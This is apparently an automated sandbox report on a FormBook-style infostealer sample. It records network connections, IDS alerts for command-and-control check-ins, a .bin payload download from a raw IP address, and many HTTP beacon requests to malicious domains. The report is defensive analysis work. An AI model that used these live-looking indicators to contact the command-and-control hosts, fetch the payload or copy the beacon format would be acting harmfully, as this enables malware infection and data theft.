Source: C:\Windows\explorer.exe	Network Connect: 8.212.100.103 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.17.157.1 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 195.110.124.133 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 118.27.130.228 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 38.53.14.66 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 199.188.104.120 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 45.77.219.226 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 38.53.14.151 80	Jump to behavior

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49842 -> 198.46.176.189:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49867 -> 199.188.104.120:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49871 -> 107.148.132.46:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49873 -> 52.76.96.91:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49878 -> 45.77.219.226:80
Source: Traffic	Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.11.20:59142 -> 9.9.9.9:53
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49890 -> 107.148.132.46:80

Uses netstat to query active network connections and open ports

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE

Performs DNS queries to domains with low reputation

Source:

DNS query: www.civzbpp.xyz

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.civzbpp.xyz/ms14/

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=ZV58cyt7lud3nw6eSnCnw3hvj6dUBdrYkOi4GK43GwnmJSRRdDKHOou2s3Asj9CH0dO3&5jjx=X41P HTTP/1.1Host: www.qwevqgjw.cfdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=0MCVt3ro+Y2fULC7mglHTnfgc1Mr+oeAYZcaZJUD5Vdcg90q3P52QZV9uqsVct+gY69j&5jjx=X41P HTTP/1.1Host: www.lasik-de-de-8808230.zoneConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=gRDHLRWps2SwfQlNymIqzXaD2m02lj01kyW0DgHYrNguW9LYnKWDMhmIqN1YZq9kwDef&5jjx=X41P HTTP/1.1Host: www.qhrxnxoe.cfdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=FAG/3ElgsYO4ErXa/mgt4C2qrKDxzHtkbmVaewmXtr6V8s4U3UCtQRfDU66dhU0yfzW0&5jjx=X41P HTTP/1.1Host: www.sxbhpysr.cfdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=x+ehIhQzCHSzi6+DzanXnJOFQcXmX6xS+w2gYe8McJfF9Pp0nYwm3E09SfZIXmikxG0j&5jjx=X41P HTTP/1.1Host: www.venria.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=Wkneoq9l7j621GOHWXUj6c6StoZcfXIkvhnfDRklCPhPpoBwnB0eenfjXWBkChp12+Xn&5jjx=X41P HTTP/1.1Host: www.zbjcolwy.cfdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=h3fLfZ3xRyUaMvmJY+vXkDus6c4OoHicU91y3xWN8xaUQgPaFkGWnw7wqHbjUCdbn7CG&5jjx=X41P HTTP/1.1Host: www.ypasbfxplu.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=4tMVn6XiBHKuKW8VU2EIZ5B/qrpEFZzqaYDMFWWeQmJxL9kkTfJwlmrKp7OjJJRb95od&5jjx=X41P HTTP/1.1Host: www.nihil.oneConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=u3S/fUpBdl6P8b4ADNn+FVx0VEGCDPoJ7b9d+427u3NTiKr5dAp1QyZtAqVtC5y+GShx&5jjx=X41P HTTP/1.1Host: www.lilith-con.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=YHJhEiWoifUmsuRZQbUaqtt89OE4JOQRavFR3vIQ0joiEOwiU7X+YqSmQ5n9nRvRM2aG&5jjx=X41P HTTP/1.1Host: www.lojaasoriginais.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=CKdxKfUSo22ZA3LOsCE+RVTQXZ6VDMwkgwUFVpD0jjvtMSwdrQmMlQAEfm5imY1vlK4D&5jjx=X41P HTTP/1.1Host: www.aniwatch.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=zE+GbO9DWh6B2kXf3cE5o589bQHva9Su9PKDhuKrO6jzYqtjY6jl14E5kwylDApimKPF&5jjx=X41P HTTP/1.1Host: www.genqaagz.cfdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=zE+GbO9DWh6B2kXf3cE5o589bQHva9Su9PKDhuKrO6jzYqtjY6jl14E5kwylDApimKPF&5jjx=X41P HTTP/1.1Host: www.genqaagz.cfdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=3gz0oynYp3zT8Gk2EcItbwP2BcX4ajQnXUoMFrcFLcYyHJZZ+09POgtQTNUueZNkOof2&5jjx=X41P HTTP/1.1Host: www.duffledash.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=yfXJ3s0X+UYbexsvWZAPRPW6ab6VS3ID2ShjjTekTQ3Ib7o/HmiXiV9bVqQN/326JqDz&-Zxtd=AXLT HTTP/1.1Host: www.aqeabrdm.cfdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=v4jnj8oeAfTGDwcmYumWnwKscPxyy00cSlVLGwHp+ICaVPGa7n49O8PyWRHvgaeZi/w4&-Zxtd=AXLT HTTP/1.1Host: www.cacciatoridiofferte.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=gRDHLRWps2SwfQlNymIqzXaD2m02lj01kyW0DgHYrNguW9LYnKWDMhmIqN1YZq9kwDef&-Zxtd=AXLT HTTP/1.1Host: www.qhrxnxoe.cfdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=FUnpMs8zmvOjmROP3PnlROYxRJ7cCFlgEWWc0/bexyWbb6gAbwR4+JgC7sIqrRtPqJOK&-Zxtd=AXLT HTTP/1.1Host: www.peterscanner.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=NKGPptx3tESdr+Lz8Wah6kurfWuL/UsV93iNqja3hqRom8j7cqld1UX1ucUTWIz98wJ+&-Zxtd=AXLT HTTP/1.1Host: www.pgtjirqx.cfdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=NKGPptx3tESdr+Lz8Wah6kurfWuL/UsV93iNqja3hqRom8j7cqld1UX1ucUTWIz98wJ+&-Zxtd=AXLT HTTP/1.1Host: www.pgtjirqx.cfdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=NKGPptx3tESdr+Lz8Wah6kurfWuL/UsV93iNqja3hqRom8j7cqld1UX1ucUTWIz98wJ+&-Zxtd=AXLT HTTP/1.1Host: www.pgtjirqx.cfdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms14/?1b-=CKdxKfUSo22ZA3LOsCE+RVTQXZ6VDMwkgwUFVpD0jjvtMSwdrQmMlQAEfm5imY1vlK4D&-Zxtd=AXLT HTTP/1.1Host: www.aniwatch.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 188.114.97.14 188.114.97.14

Source: global traffic

HTTP traffic detected: GET /windows/kHjzvgNVUFKkek92.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: 198.46.176.189Cache-Control: no-cache

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Wed, 02 Aug 2023 18:37:29 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 02 Aug 2023 18:39:53 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: 300X-Sorting-Hat-ShopId: 79040119085X-Dc: gcp-europe-west3X-Request-ID: 9b512c4d-7850-493c-b96d-8b21dfec2e2fX-XSS-Protection: 1; mode=blockX-Download-Options: noopenX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OeqPoKtttstQG8BVcOPkW6TdPc49wdMyx%2FsV8Ll0ZdvhhPuzrDQjHykHqr9T8fic5DtTtUSk6LoZw%2FOAwKFq6%2FFUKjU44WmfsxRhgF0wWSGBrGOQYM7FYCcMm1PQlDnjfED2ebruf8Or2phs"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=16.999960Server: cloudflareCF-RAY: 7f0872346eff30d2-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{p
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 02 Aug 2023 18:41:13 GMTContent-Type: text/htmlContent-Length: 291ETag: "64c88067-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 02 Aug 2023 18:41:54 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6d 73 31 34 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ms14/ was not found on this server.</p></body></html>

Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.176.189

Source: wLlREXsA9M.exe, 00000003.00000002.1077566633.00000000025A5000.00000004.00000020.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000003.975376013.00000000025A7000.00000004.00000020.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000003.974811648.00000000025A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://198.46.176.189/
Source: wLlREXsA9M.exe, 00000003.00000002.1077566633.0000000002585000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://198.46.176.189/windows/kHjzvgNVUFKkek92.bin
Source: wLlREXsA9M.exe, 00000003.00000002.1077566633.0000000002585000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://198.46.176.189/windows/kHjzvgNVUFKkek92.bin.
Source: explorer.exe, 00000004.00000000.1003204697.000000000CC1B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5864588777.000000000CC1B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2626039120.000000000CC1B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CC1B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CC1B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: explorer.exe, 00000004.00000003.1625996689.000000000CBC3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CBC3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CBC3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2626039120.000000000CBC3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5864588777.000000000CBC3000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000004.00000000.1003204697.000000000CC1B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5864588777.000000000CC1B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2626039120.000000000CC1B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CC1B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CC1B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: explorer.exe, 00000004.00000000.996144169.00000000094AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CA98000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5864588777.000000000CA9F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2623941912.00000000094AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CA9F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CA9F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5857711636.00000000094AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: wLlREXsA9M.exe, 00000003.00000001.908308746.0000000000649000.00000020.00000001.01000000.00000005.sdmp	String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
Source: wLlREXsA9M.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: wLlREXsA9M.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000004.00000000.996144169.00000000094AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CA98000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5864588777.000000000CA9F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2623941912.00000000094AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CA9F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CA9F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5857711636.00000000094AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: explorer.exe, 00000004.00000003.1625996689.000000000CA98000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5864588777.000000000CA9F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CA9F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CA9F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl?Fq
Source: explorer.exe, 00000004.00000003.1625996689.000000000CA98000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5864588777.000000000CA9F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CA9F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CA9F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5864588777.000000000CA35000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CA35000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: explorer.exe, 00000004.00000003.2618208073.0000000010F8F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2599670367.0000000010F8F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2633107162.0000000010FA4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.m
Source: explorer.exe, 00000004.00000000.1000536832.000000000AD30000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.986693727.0000000002DA0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.999382809.0000000009B70000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
